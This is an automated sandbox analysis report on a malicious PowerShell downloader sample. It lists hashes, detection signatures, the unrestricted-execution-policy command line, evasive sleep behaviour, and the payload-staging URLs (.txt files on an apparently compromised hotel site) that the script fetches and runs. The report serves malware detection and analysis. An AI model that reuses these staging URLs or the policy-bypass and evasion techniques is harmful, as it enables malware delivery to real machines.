Edit tour

Windows Analysis Report
WxEDf7a2Gy.ps1

Overview

General Information

Sample name:WxEDf7a2Gy.ps1
renamed because original name is a hash value
Original sample name:49ade2477364f9fd141a518374a93a7f940785739ce67abecad5bc7d7a18f19e.ps1
Analysis ID:1671720
MD5:9403cd33d5c7ae6164025fcdd1c90a18
SHA1:3e06d2f60f0a42acd70e33188318f1673a52369b
SHA256:49ade2477364f9fd141a518374a93a7f940785739ce67abecad5bc7d7a18f19e
Tags:cdt2025-ddns-netcepas2023-duckdns-orgchromedata-accesscam-orgchromedata-webredirect-orgpirulito25-duckdns-orgps1user-JAMESWT_WT
Infos:

Detection

Score:48
Range:0 - 100
Confidence:100%

Signatures

AI detected malicious Powershell script
Joe Sandbox ML detected suspicious sample
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • powershell.exe (PID: 7040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2324, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1", ProcessId: 7040, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2324, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1", ProcessId: 7040, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleNeural Call Log Analysis: 83.2%

Phishing

barindex
Source: WxEDf7a2Gy.ps1Joe Sandbox AI: Found malicious Powershell script: High risk due to multiple dynamic code execution patterns using scriptblock creation and remote content. Downloads and executes code from non-standard web paths (.txt files in images directory). Uses two-stage execution to potentially evade detection. Domain appears legitimate but content location is suspicious.
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb0 source: powershell.exe, 00000000.00000002.1087425147.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1081424647.00000000029E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbF source: powershell.exe, 00000000.00000002.1087793854.000000000709D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1087793854.00000000070B2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: unknownDNS traffic detected: query: www.hotellatitud33sur.cl replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: www.hotellatitud33sur.cl
Source: powershell.exe, 00000000.00000002.1087425147.0000000006FE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microJ
Source: powershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1082391697.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1087793854.00000000070B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000000.00000002.1082391697.0000000004A41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBoq
Source: powershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1082391697.0000000004F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1085589937.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1082391697.0000000004C6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hotellatitud33sur.cl
Source: powershell.exe, 00000000.00000002.1082391697.0000000004F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hotellatitud33sur.cl/image
Source: powershell.exe, 00000000.00000002.1082391697.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1081745972.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp, WxEDf7a2Gy.ps1String found in binary or memory: https://www.hotellatitud33sur.cl/images/01.txt
Source: powershell.exe, 00000000.00000002.1081745972.0000000002BC6000.00000004.00000020.00020000.00000000.sdmp, WxEDf7a2Gy.ps1String found in binary or memory: https://www.hotellatitud33sur.cl/images/02.txt
Source: powershell.exe, 00000000.00000002.1082391697.0000000004DDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hotellatitud33sur.clD
Source: classification engineClassification label: mal48.winPS1@2/5@1/0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xj4bq1u.p3h.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\WxEDf7a2Gy.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb0 source: powershell.exe, 00000000.00000002.1087425147.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1081424647.00000000029E8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbF source: powershell.exe, 00000000.00000002.1087793854.000000000709D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1087793854.00000000070B2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5048Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1729Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5556Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7064Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1376Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
